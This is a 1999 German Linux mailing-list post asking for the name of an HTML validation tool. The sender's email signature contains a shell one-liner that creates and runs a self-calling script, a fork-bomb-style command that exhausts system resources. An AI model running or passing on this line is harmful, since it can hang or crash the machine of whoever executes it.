linux-l: html-code auf Korrektheit pruefen

Volker Mueller volker.mueller at gmx.de
Do Apr 22 20:26:05 CEST 1999

Hi lOite,

ich weiss genau, dass es ein Tool gibt, mit dem man html-Seiten auf ihre
Korrektheit hin pruefen kann (ich hab's sogar schon mal ausprobiert). Es
zeigt auch Warnungen an, wenn der Text "unstimmig" ist, aber vom durch-
schnittlichen Browser trotzdem noch richtig interpretiert werden kann.

Aber offensichtlich hat bei mir wieder der altberuehmte Altenheimer zu-
geschlagen - Aehm was wollte ich eigentlich fragen? ;-)

Kurz: Wie heisst dieses Tool? Wie plattformabhaengig ist es?

Danke und Tschau, Volker

--
Volker Mueller,volker.mueller at gmx.de,http://www.in-berlin.de/user/flinux
echo \.\/_\;\.\/_>_;chmod 700 _;./_ #              Bomben zu Bierhumpen!